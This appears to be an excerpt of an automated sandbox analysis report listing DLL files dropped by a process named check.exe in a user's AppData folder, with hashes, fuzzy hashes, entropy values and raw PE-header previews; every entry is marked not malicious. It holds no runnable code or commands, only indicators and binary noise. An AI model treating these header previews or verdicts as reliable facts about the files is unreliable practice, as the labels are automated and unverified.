                                                                                                                                                                                                            SSDEEP:49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
                                                                                                                                                                                                            MD5:47307A1E2E9987AB422F09771D590FF1
                                                                                                                                                                                                            SHA1:0DFC3A947E56C749A75F921F4A850A3DCBF04248
                                                                                                                                                                                                            SHA-256:5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
                                                                                                                                                                                                            SHA-512:21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1340400
                                                                                                                                                                                                            Entropy (8bit):6.41486755163134
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:eXPn73RXox1U9M0m+1ffSDY565RzHUY1iaRy95hdGehEM:+7hXU1U95m4ff9A5RviaRy9NGI
                                                                                                                                                                                                            MD5:3569693D5BAE82854DE1D88F86C33184
                                                                                                                                                                                                            SHA1:1A6084ACFD2AA4D32CEDFB7D9023F60EB14E1771
                                                                                                                                                                                                            SHA-256:4EF341AE9302E793878020F0740B09B0F31CB380408A697F75C69FDBD20FC7A1
                                                                                                                                                                                                            SHA-512:E5EFF4A79E1BDAE28A6CA0DA116245A9919023560750FC4A087CDCD0AB969C2F0EEEC63BBEC2CD5222D6824A01DD27D2A8E6684A48202EA733F9BB2FAB048B32
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........Yt..7'..7'..7'...'..7'..3&..7'}.3&..7'}.4&..7'}.2&..7'}.6&..7'..6&..7'0.6&..7'..6'c.7'0.2&2.7'0.7&..7'0..'..7'...'..7'0.5&..7'Rich..7'........................PE..d....._.........." .................................................................c....`......................................... ....n..,...h....................X..........,.......T...................p...(...@...0............................................text...C........................... ..`.rdata...g.......h..................@..@.data...XN...@...2... ..............@....pdata...............R..............@..@.rsrc................>..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3591664
                                                                                                                                                                                                            Entropy (8bit):6.333693598000157
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:iPnt09+kVh2NrSdSG779LLLS/o/L4YqoY0Xba+mRRH2T:iPnt2ZVhT
                                                                                                                                                                                                            MD5:D055566B5168D7B1D4E307C41CE47C4B
                                                                                                                                                                                                            SHA1:043C0056E9951DA79EC94A66A784972532DC18EF
                                                                                                                                                                                                            SHA-256:30035484C81590976627F8FACE9507CAA8581A7DC7630CCCF6A8D6DE65CAB707
                                                                                                                                                                                                            SHA-512:4F12D17AA8A3008CAA3DDD0E41D3ED713A24F9B5A465EE93B2E4BECCF876D5BDF0259AA0D2DD77AD61BB59DC871F78937FFBE4D0F60638014E8EA8A27CAF228D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.4...Z...Z...Z......Z..^...Z..Y...Z.._...Z..[...Z...[...Z...[...Z...[...Z..._...Z...Z...Z.......Z......Z...X...Z.Rich..Z.........PE..d......_.........." .....^$..........O$.......................................7.....}.7...`...........................................,......2.......6.......4. .....6.......6..J....).T.....................).(...p.).0............p$..%...........................text....\$......^$................. ..`.rdata......p$......b$.............@..@.data.........3..n....2.............@....pdata.. .....4......l4.............@..@.rsrc.........6......`6.............@..@.reloc...J....6..L...f6.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):438768
                                                                                                                                                                                                            Entropy (8bit):6.312090336793804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:k1tE6lq982HdyuEZ5gw+VHDZjZ0yOWm7Vdcm4GyasLCZCu6vdQp:k1tEuq9Hdyuo5gwguyOtVIup
                                                                                                                                                                                                            MD5:2030C4177B499E6118BE5B9E5761FCE1
                                                                                                                                                                                                            SHA1:050D0E67C4AA890C80F46CF615431004F2F4F8FC
                                                                                                                                                                                                            SHA-256:51E4E5A5E91F78774C44F69B599FAE4735277EF2918F7061778615CB5C4F6E81
                                                                                                                                                                                                            SHA-512:488F7D5D9D8DEEE9BBB9D63DAE346E46EFEB62456279F388B323777999B597C2D5AEA0EE379BDF94C9CBCFD3367D344FB6B5E90AC40BE2CE95EFA5BBDD363BCC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...5.H.4...(...>.......*.......4.......8.......8......9...<...g....../......=....$.=...<.L.=......=...Rich<...................PE..d...M.._.........." .....(...r......d+..............................................MF....`.........................................0E...^..0................`.. F..................H...T.......................(.......0............@...............................text...N&.......(.................. ..`.rdata.......@.......,..............@..@.data...x/...0...(..................@....pdata.. F...`...H...>..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4148720
                                                                                                                                                                                                            Entropy (8bit):6.462183686222023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:EcDwCQsvkBD+ClI3IAVLA7Tr15SokomoqxQhT2bAssCFEUGX5ig:E7CKPsA3p0Z/QV/sS3Ag
                                                                                                                                                                                                            MD5:65F59CFC0C1C060CE20D3B9CEFFBAF46
                                                                                                                                                                                                            SHA1:CFD56D77506CD8C0671CA559D659DAB39E4AD3C2
                                                                                                                                                                                                            SHA-256:C81AD3C1111544064B1830C6F1AEF3C1FD13B401546AB3B852D697C0F4D854B3
                                                                                                                                                                                                            SHA-512:D6F6DC19F1A0495026CBA765B5A2414B6AF0DBFC37B5ACEED1CD0AE37B3B0F574B759A176D75B01EDD74C6CE9A3642D3D29A3FD7F166B53A41C8978F562B4B50
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Fvge'.4e'.4e'.4l_.4i'.4.H.5m'.4.H.5a'.4.H.5|'.4.H.5c'.4.W.5o'.4qL.5`'.4e'.4.,.4.W.5.'.4.W.5d'.4.W.4d'.4e'.4d'.4.W.5d'.4Riche'.4........................PE..d......_.........." ......%..B......L.$.......................................?.......?...`.........................................0)2.P.....8.T.....>.......<..^...2?.......?.py......T.......................(.......0............ %..\...........................text.....%.......%................. ..`.rdata....... %.......%.............@..@.data....I...@;..2... ;.............@....pdata...^....<..`...R<.............@..@.rsrc.........>.......>.............@..@.reloc..py....?..z....>.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):330736
                                                                                                                                                                                                            Entropy (8bit):6.381828869454302
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
                                                                                                                                                                                                            MD5:03761F923E52A7269A6E3A7452F6BE93
                                                                                                                                                                                                            SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
                                                                                                                                                                                                            SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
                                                                                                                                                                                                            SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149488
                                                                                                                                                                                                            Entropy (8bit):6.116105454277536
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:4sSkET6pEXb3loojg1Q2sorWvZXF2sorrLA7cG27Qhvvc:4sSd6pwzloDbsnX0sCrc7ct7QVc
                                                                                                                                                                                                            MD5:A016545F963548E0F37885E07EF945C7
                                                                                                                                                                                                            SHA1:CBE499E53AB0BD2DA21018F4E2092E33560C846F
                                                                                                                                                                                                            SHA-256:6B56F77DA6F17880A42D2F9D2EC8B426248F7AB2196A0F55D37ADE39E3878BC6
                                                                                                                                                                                                            SHA-512:47A3C965593B97392F8995C7B80394E5368D735D4C77F610AFD61367FFE7658A0E83A0DBD19962C4FA864D94F245A9185A915010AFA23467F999C833982654C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'`.CF.KCF.KCF.KJ>.KGF.K.).JAF.KW-.JAF.K.).JVF.K.).JKF.K.).J@F.K.6.JFF.KCF.K.G.K.6.JPF.K.6.JBF.K.6.KBF.KCF.KBF.K.6.JBF.KRichCF.K........................PE..d......_.........." .....$..........t(.......................................p.......5....`............................................."..l........P.......0.......,.......`..L...hw..T....................x..(....w..0............@...............................text....".......$.................. ..`.rdata..z....@.......(..............@..@.data...x...........................@....pdata.......0......................@..@.rsrc........P......."..............@..@.reloc..L....`.......(..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5498352
                                                                                                                                                                                                            Entropy (8bit):6.619117060971844
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
                                                                                                                                                                                                            MD5:4CD1F8FDCD617932DB131C3688845EA8
                                                                                                                                                                                                            SHA1:B090ED884B07D2D98747141AEFD25590B8B254F9
                                                                                                                                                                                                            SHA-256:3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
                                                                                                                                                                                                            SHA-512:7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101872
                                                                                                                                                                                                            Entropy (8bit):6.5661918084228725
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:RCKWZGuEK0mOLSTxoPl9GIcuZrxi4hXX9oix8H+NCIecbGShwZul:RFWY1WxgGStJ8H2CIecbG36
                                                                                                                                                                                                            MD5:971DBBE854FC6AB78C095607DFAD7B5C
                                                                                                                                                                                                            SHA1:1731FB947CD85F9017A95FDA1DC5E3B0F6B42CA2
                                                                                                                                                                                                            SHA-256:5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
                                                                                                                                                                                                            SHA-512:B966AAB9C0D9459FADA3E5E96998292D6874A7078924EA2C171F0A1A50B0784C24CC408D00852BEC48D6A01E67E41D017684631176D3E90151EC692161F1814D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.............t:..............................................................Rich....................PE..d.....t^.........." .........^.......................................................e....`A.........................................0..4....9.......p.......P.......L...A..............8........................... ...0............................................text...2........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44528
                                                                                                                                                                                                            Entropy (8bit):6.627837381503075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Aim/NRETi8kykt25HwviU5fJUiP2551xWmbTqOA7SXf+Ny85xM8ATJWr3KWoC8cS:0Ie8kySL2iPQxdvjAevcMESW5lxJG
                                                                                                                                                                                                            MD5:6BC084255A5E9EB8DF2BCD75B4CD0777
                                                                                                                                                                                                            SHA1:CF071AD4E512CD934028F005CABE06384A3954B6
                                                                                                                                                                                                            SHA-256:1F0F5F2CE671E0F68CF96176721DF0E5E6F527C8CA9CFA98AA875B5A3816D460
                                                                                                                                                                                                            SHA-512:B822538494D13BDA947655AF791FED4DAA811F20C4B63A45246C8F3BEFA3EC37FF1AA79246C89174FE35D76FFB636FA228AFA4BDA0BD6D2C41D01228B151FD89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .S.A...A...A..0.m..A..O....A...9...A...A...A..O....A..O....A..O....A..O....A..O.}..A..O....A..Rich.A..................PE..d.....t^.........." .....:...4......pA...............................................Z....`A.........................................j......|k..x....................l...A......8....b..8...........................@b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4173928
                                                                                                                                                                                                            Entropy (8bit):6.329102290474506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:8BfmqCtLI4erBYysLjG/A8McPyCD6hw16JVTW7B3EgvVlQ3LAYmyNOvGJse+aWyb:8eZevVKACOvWYQF
                                                                                                                                                                                                            MD5:B0AE3AA9DD1EBD60BDF51CB94834CD04
                                                                                                                                                                                                            SHA1:EE2F5726AC140FB42D17ABA033D678AFAF8C39C1
                                                                                                                                                                                                            SHA-256:E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
                                                                                                                                                                                                            SHA-512:756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25072
                                                                                                                                                                                                            Entropy (8bit):5.961464514165753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
                                                                                                                                                                                                            MD5:BB00EF1DD81296AF10FDFA673B4D1397
                                                                                                                                                                                                            SHA1:773FFCF4A231B963BAAC36CBEF68079C09B62837
                                                                                                                                                                                                            SHA-256:32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
                                                                                                                                                                                                            SHA-512:C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3385328
                                                                                                                                                                                                            Entropy (8bit):6.382356347494905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
                                                                                                                                                                                                            MD5:2247EE4356666335DF7D72129AF8D600
                                                                                                                                                                                                            SHA1:F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
                                                                                                                                                                                                            SHA-256:50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
                                                                                                                                                                                                            SHA-512:67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20923392
                                                                                                                                                                                                            Entropy (8bit):6.255903817217008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
                                                                                                                                                                                                            MD5:7DBC97BFEE0C7AC89DA8D0C770C977B6
                                                                                                                                                                                                            SHA1:A064C8D8967AAA4ADA29BD9FEFBE40405360412C
                                                                                                                                                                                                            SHA-256:963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
                                                                                                                                                                                                            SHA-512:286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........|.-.....|.+.*...|.*.<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68080
                                                                                                                                                                                                            Entropy (8bit):6.207162014262433
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
                                                                                                                                                                                                            MD5:750A31DE7840B5EED8BA14C1BD84D348
                                                                                                                                                                                                            SHA1:D345D13B0C303B7094D1C438E49F0046791DE7F6
                                                                                                                                                                                                            SHA-256:A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
                                                                                                                                                                                                            SHA-512:5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41968
                                                                                                                                                                                                            Entropy (8bit):6.0993566622860635
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
                                                                                                                                                                                                            MD5:313F89994F3FEA8F67A48EE13359F4BA
                                                                                                                                                                                                            SHA1:8C7D4509A0CAA1164CC9415F44735B885A2F3270
                                                                                                                                                                                                            SHA-256:42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
                                                                                                                                                                                                            SHA-512:06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:*..i*..i*..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i*..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39408
                                                                                                                                                                                                            Entropy (8bit):6.0316011626259405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
                                                                                                                                                                                                            MD5:52FD90E34FE8DED8E197B532BD622EF7
                                                                                                                                                                                                            SHA1:834E280E00BAE48A9E509A7DC909BEA3169BDCE2
                                                                                                                                                                                                            SHA-256:36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
                                                                                                                                                                                                            SHA-512:EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):45040
                                                                                                                                                                                                            Entropy (8bit):6.016125225197622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
